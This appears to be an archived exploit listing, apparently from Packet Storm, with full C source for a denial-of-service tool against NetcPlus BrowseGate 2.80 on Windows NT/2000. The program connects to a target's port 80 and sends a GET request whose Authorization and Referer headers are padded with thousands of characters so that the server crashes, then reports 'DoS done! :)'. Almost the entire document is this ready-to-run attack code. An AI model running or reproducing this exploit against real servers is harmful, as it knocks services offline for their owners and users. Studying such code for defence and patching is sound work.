Denial of service for NetcPlus BrowseGate 2.80 for Windows NT and 2000 when you sned more than 8000 characters in a GET / http-request, causing the system to crash.
d3ef954f1000d0d320d818df9bf2c1cb98834ce4871086275220da6bfdf2fb14 /*
* NetcPlus BrowseGate denial of Service
* -------------------------------------
* Written quickly for eScx 90
*
* grtz to glyc, soph, tessa, entire securax, lamagra & steven, shelloracle ,...
* by incubus <incubus@securax.org>
*
*/
#include <netdb.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
int main(int argc, char **argv){
char tessa[32768];
int i, sock, result;
struct sockaddr_in name;
struct hostent *hostinfo;
if (argc < 2){
printf ("\nNetcPlus BrowseGate denial of Service\nby incubus <incubus@securax.org>\n\n");
printf ("try %s www.server.com \n\n", argv[0]);
exit(0);
}
hostinfo=gethostbyname(argv[1]);
if (!hostinfo){
herror("Oops");
exit(-1);
}
name.sin_family=AF_INET;
name.sin_port=htons(80);
name.sin_addr=*(struct in_addr *)hostinfo->h_addr;
sock=socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0){
herror("Oops");
exit(-1);
}
result=connect(sock, (struct sockaddr *)&name, sizeof(struct sockaddr_in));
if (result != 0){
herror("Oops");
exit(-1);
}
strcpy(tessa,"GET / HTTP/1.0\n");
strcat(tessa,"Authorization: Basic");
for (i=0; i<9000; i++)
strcat(tessa, "a");
strcat(tessa, "\nFrom: some@email.com\n");
strcat(tessa, "If-Modified-Since: Sat, 12 Nov 1999 12:34:56 GMT\n");
strcat(tessa, "Referer: http://www.blah.com/");
for (i=0; i<9000; i++)
strcat(tessa, "a");
strcat(tessa, "\nUserAgent: Br0wser 666\n\n\n");
send(sock, tessa, sizeof(tessa) , 0);
close(sock);
printf ("DoS done! :)\n\n");
exit(0);
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed